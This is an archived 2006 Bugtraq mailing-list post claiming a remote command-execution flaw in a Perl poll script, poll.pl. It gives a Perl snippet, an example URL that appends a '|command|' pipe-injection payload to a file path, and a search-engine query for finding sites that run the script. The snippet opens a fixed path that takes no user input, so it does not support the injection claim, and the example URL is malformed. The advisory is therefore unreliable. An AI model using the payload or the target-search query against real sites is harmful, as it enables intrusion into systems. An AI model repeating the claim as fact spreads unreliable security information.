[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

poll.pl<--remote commands execution exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: poll.pl<--remote commands execution exploit
From: CrAzY.CrAcKeR@xxxxxxxxxxx
Date: 26 Apr 2006 02:07:49 -0000

Subject:poll.pl<--remote commands execution 

>>>>>>>>-----------------<<<<<<<<

foud by:CrAzY CrAcKeR
::::...alshmokh team...::::
Site: http://www.alshmokh.com

>>>>>>>>-----------------<<<<<<<<

Bug is found in this script:
open (HAND,"/web/htdocs/ronpoll/question") || die "Error opening file polldata 
$!|n"; 
while (<HAND>) {
  print;
 }
>>>>>>>>-----------------<<<<<<<<

----example:

http://web/htdocs/ronpoll/question|command|

----Search:

allinurl:"poll.pl"

>>>>>>>>-----------------<<<<<<<<
E-mail: CrAzY.CrAcKeR@xxxxxxxxxxx
presentation for each separation alshmokh

Prev by Date: Invision Power Board 2.1.5 POC
Next by Date: W-Agora 4.20 XSS
Previous by thread: Invision Power Board 2.1.5 POC
Next by thread: W-Agora 4.20 XSS
Index(es):
- Date
- Thread